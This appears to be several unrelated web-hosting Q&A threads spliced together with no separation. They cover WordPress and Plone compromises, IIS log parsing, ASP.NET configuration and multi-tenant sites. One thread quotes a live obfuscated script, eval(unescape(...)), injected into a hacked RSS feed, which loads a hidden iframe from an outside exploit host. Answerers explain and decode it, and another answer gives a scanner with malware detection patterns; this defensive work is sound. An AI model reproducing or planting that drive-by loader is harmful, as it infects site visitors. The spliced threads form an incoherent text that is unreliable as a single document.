For a few days now, my WordPress website has been infected with malware.
The website is unresponsive; I get error 500 when trying to access it.
The admin panel shows a popup window written in Russian:
http://imghost.in/images/2018/08/27/22f42129593820fa959655c622c426d0.png
How can I remove it and get my website back?
Any help will be appreciated!
So, to sum things up:
Firstly, if it has been infected for a few days, ask your provider for a rollback/backup. Most providers keep backups for 7 days by default (longer depending on your subscription type and added security). I would recommend keeping your own backups in the future, including the database.
If the provider cannot supply a backup from before the infection, see if they can run a scan and tell you exactly which files are infected; this will speed up the debugging process. What you will be looking for are entire folders that are "out of place" and have randomly generated names like "qwewyeg". Delete all of those folders. Infected files will usually contain a class, or a class extension, that makes an external call. These are usually planted at the beginning of an infected file and also have randomly generated class names like "qdhjsahd". Delete those sections.
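If you have to hunt for those injected sections by hand, a crude text scan over a local copy of the site can narrow things down. This is only a minimal sketch in C# (the path and the list of suspicious patterns are my own assumptions, not a definitive malware signature list):

    using System;
    using System.IO;
    using System.Text.RegularExpressions;

    class InfectionScan
    {
        static void Main()
        {
            // Hypothetical local copy of the site, pulled down over SFTP.
            var root = @"C:\backup\site-copy";

            // Constructs commonly seen in injected PHP: eval of encoded
            // blobs, base64 decoding, and outbound calls. Matches are
            // leads to review by hand, not proof of infection.
            var suspicious = new Regex(
                @"eval\s*\(|base64_decode\s*\(|gzinflate\s*\(|curl_exec\s*\(",
                RegexOptions.IgnoreCase);

            foreach (var file in Directory.EnumerateFiles(
                root, "*.php", SearchOption.AllDirectories))
            {
                if (suspicious.IsMatch(File.ReadAllText(file)))
                    Console.WriteLine("Review manually: " + file);
            }
        }
    }

Anything this flags still needs eyeballing; legitimate plug-ins sometimes use these functions too.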
Once all infections have been removed, change all of your passwords and switch from FTP to SFTP. Update WordPress itself as well as its themes and plug-ins.
When you've done all that, you should be fine.
I am new to IIS (honestly, I've only been on it a few times), but I have a new requirement to track the number of times people access links within certain folders (our website is basically a set of pages that use IIS Directory Browsing to make files available), and then build a report for each of the "watched" directories showing the number of accesses and the date last accessed.
What I'm thinking of is writing some code that parses an IIS7 log or report, looks for the specific folders, and uses a counter to track the number of accesses and the last time each folder was accessed. My question is: does IIS7 provide a built-in utility that records when links are accessed? It's fine if you can't tell it to watch certain links and it records all traffic instead; the parser can look for certain strings to find the folder accesses needed.
I can't use any 3rd party solutions, just what is native to IIS7.
Thanks in advance!
If you want a tool that already does that, there are plenty out there, such as AWStats (http://awstats.sourceforge.net/). You could also use LogParser to parse the logs easily and produce reports based on them: http://blogs.msdn.com/b/carlosag/archive/2010/03/25/analyze-your-iis-log-files-favorite-log-parser-queries.aspx
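If you do end up hand-rolling the parser described in the question, note that the W3C log format declares its own column order in a #Fields: header, so the counting logic stays short. A rough sketch in C# (the log path and folder names are placeholders):

    using System;
    using System.IO;
    using System.Linq;

    class FolderHitReport
    {
        static void Main()
        {
            var logFile = @"C:\inetpub\logs\LogFiles\W3SVC1\u_ex101005.log";
            var watched = new[] { "/reports/", "/downloads/" };
            var counts = watched.ToDictionary(f => f, f => 0);
            var lastSeen = watched.ToDictionary(f => f, f => DateTime.MinValue);
            int dateIdx = -1, timeIdx = -1, uriIdx = -1;

            foreach (var line in File.ReadLines(logFile))
            {
                if (line.StartsWith("#Fields:"))
                {
                    // The log declares its own column order.
                    var fields = line.Substring(8).Trim().Split(' ');
                    dateIdx = Array.IndexOf(fields, "date");
                    timeIdx = Array.IndexOf(fields, "time");
                    uriIdx = Array.IndexOf(fields, "cs-uri-stem");
                    continue;
                }
                if (line.StartsWith("#") || uriIdx < 0) continue;

                var parts = line.Split(' ');
                var uri = parts[uriIdx];
                foreach (var folder in watched.Where(f =>
                    uri.StartsWith(f, StringComparison.OrdinalIgnoreCase)))
                {
                    counts[folder]++;
                    // Log entries are chronological, so the last match wins.
                    lastSeen[folder] = DateTime.Parse(
                        parts[dateIdx] + " " + parts[timeIdx]);
                }
            }

            foreach (var f in watched)
                Console.WriteLine(f + ": " + counts[f] + " hits, last " + lastSeen[f]);
        }
    }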
I have been given a job to redevelop a news portal. The website already has a couple of thousand unique visits a day. I am going to develop it using ASP.NET WebForms. I am currently in the planning phase, and I am thinking of offering the main admin a page where he can change site-specific configuration. Some of these settings are:
Web site title "<title>"
site URL
footer text
default image directory
whether to accept comments without authorisation or not
I listed some settings above so that you can understand my scenario better.
What I can't decide is where to store all this information. Do I store it in a DB (costly?), a custom XML file, or a .config file (e.g. ConfigurationManager.AppSettings)?
Any pros or cons would make my day!
Thank you!
My opinion is to store them in web.config (read via WebConfigurationManager.OpenWebConfiguration().GetSection()), because these variables are critical and change only once, when the site is initialized.
For example, the default image directory stays the same for the rest of the site's life, and the same goes for the site URL and the others.
Also, when you change these settings you probably need to restart the web application anyway, because you will almost certainly have read them into some static variables that need refreshing.
And because these variables stay as they are and are needed to start the web application (only then do you read the database and the rest), you need them available first-hand, from web.config.
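A minimal sketch of that approach, assuming the values live in <appSettings> in web.config (the key names here are invented for the example):

    using System.Web.Configuration;

    public static class SiteSettings
    {
        // Read once into statics; editing web.config recycles the app,
        // so these are effectively constant for the application's life.
        public static readonly string SiteTitle =
            WebConfigurationManager.AppSettings["SiteTitle"];
        public static readonly string SiteUrl =
            WebConfigurationManager.AppSettings["SiteUrl"];
        public static readonly string DefaultImageDirectory =
            WebConfigurationManager.AppSettings["DefaultImageDirectory"];
        public static readonly bool ModerateComments =
            bool.Parse(WebConfigurationManager.AppSettings["ModerateComments"] ?? "true");
    }

The admin page can write new values back through WebConfigurationManager.OpenWebConfiguration() and Save(), which triggers that application restart as a side effect.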
I ran into some trouble modifying my product and reinstalling it, so I tried installing the version I know works on my live site.
Still no love, just an error message I can't decipher which seems to contain spam! Any suggestions as to how I can diagnose this or where to seek help?
This pastie has the error, truncated due to size:
http://www.pastie.org/2715995
Come to think of it I did see an unidentified user listed at one stage...
Thanks!
Most likely, your site has been compromised by an automated script exploiting CVE-2011-2528. The script adds accounts, changes passwords of existing accounts, and customizes your main_template macro.
In order to clean this up, you need to:
Install the Plone Hotfix.
Reset your session secrets to prevent reuse of old session cookies the attacker may still have.
Audit the accounts present, removing any you do not recognize, especially any with Administrator access.
Clean up your main_template macro. If you never customized it through the web, simply delete it from your portal_skins/custom folder (go to the ZMI, select portal_skins, then custom, and delete it); otherwise, edit it and remove the hidden links at the bottom.
My feed is broken: Feed Validator says this portion is the problem. Any thoughts?
]]></content:encoded>
<wfw:commentRss>http://sweatingthebigstuff.com/2010/01/21/5-steps-to-get-out-of-debt/feed/</wfw:commentRss>
<slash:comments>2</slash:comments>
</item>
</channel>
</rss>
<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>
<script language="javascript">eval(unescape("%64%6F%63...
You've been hacked. An attacker has compromised your site and added this script to the bottom of some of your pages (probably all of them, judging by your main site). It loads a bunch of exploit code against web-browsers and plugins that attempts to infect other people's computers. That it also results in the RSS being invalid is a side-effect.
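You can confirm what the payload does by decoding the percent-escapes yourself; a quick sketch in C# (the string is the one from the feed above, split across literals for readability):

    using System;

    class DecodePayload
    {
        static void Main()
        {
            var payload =
                "%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65" +
                "%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78" +
                "%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31" +
                "%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E" +
                "%3C%2F%69%66%72%61%6D%65%3E%27%29%3B";

            // Prints: document.write('<iframe src="http://iss9w8s89xx.org/in.php"
            // width=1 height=1 frameborder=0></iframe>');
            Console.WriteLine(Uri.UnescapeDataString(payload));
        }
    }

That hidden 1x1 iframe pulls in the attack page, which is exactly the "loads exploit code" behaviour described above.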
You need to get the site off-line before it infects more people, then work on the clean-up, which will depend on how they compromised it and what kind of server it is. At the very least you will need to delete your current site code and upload fresh new scripts, from a machine you know is clean(*), with all your passwords changed. If it's your own [virtual] server, you will need to check that the server itself hasn't been rooted.
(*: a very common way sites are getting compromised at the moment is through hacked client machines running FTP. The trojans steal the FTP passwords when you connect. So you need to check and disinfect every machine you might have used to connect to the site. And if you find anything suspicious on one of them, don't trust AV tools to completely clean it, because today they just can't keep up with the quantity of malcode out there. Re-install the operating system instead.)
Is it possible or feasible to run a bunch of web sites off of only one code base?
For example, I have one site that bases its connection string on the domain name or subdomain name. Depending on which domain/subdomain is hitting the site, it returns content that is stored in a database specifically for that site.
What types of issues might occur from doing this, specifically with ASP.NET?
It's quite acceptable.
Just note that anyone can send any host name they like in the request, and you may pick it up (as long as you've configured a host header for it), so make sure you don't go around making something like 'admin.foo' while relying only on the host name for security (you'd be mad to, obviously).
I see no problem with it.
It works and is proven; see DotNetNuke for just one example of this.
A request comes in; regex/character-match the domain name, load the settings for that domain (base path to images, CSS, config, pages, etc.), and off you go.
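In ASP.NET terms, that lookup can be as small as a dictionary keyed by host name. A sketch under those assumptions (the host names and connection strings are illustrative):

    using System;
    using System.Collections.Generic;
    using System.Web;

    public static class TenantConnections
    {
        // Hypothetical map from incoming host name to connection string.
        static readonly Dictionary<string, string> Map =
            new Dictionary<string, string>(StringComparer.OrdinalIgnoreCase)
        {
            { "siteone.example.com", "Server=db;Database=SiteOne;Integrated Security=true" },
            { "sitetwo.example.com", "Server=db;Database=SiteTwo;Integrated Security=true" },
        };

        public static string Current
        {
            get
            {
                var host = HttpContext.Current.Request.Url.Host;
                string cs;
                if (!Map.TryGetValue(host, out cs))
                    throw new InvalidOperationException("Unknown host: " + host);
                return cs;
            }
        }
    }

Failing loudly on an unknown host avoids silently serving one tenant's data under another tenant's domain.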
The gotcha to look out for is if your application is both a) storing data in memory and b) using the same application space. So if, for example, you want to dish up two different blogs and you want the data to be resident in memory (if, say, your back-end store was XML and you didn't want to parse XML on every request), then you'll have to make sure that ASP.NET sees each call as a separate application (both of which can point to the same file-system folder and thus use the same files).
I ran into this exact situation when coding a multi-blog data provider for BlogEngine.Net. It uses a single code base to serve up different blogs based on the requested URL. However, since BlogEngine.Net carries its data in memory, the data provider won't work unless IIS is configured so that each blog is its own application.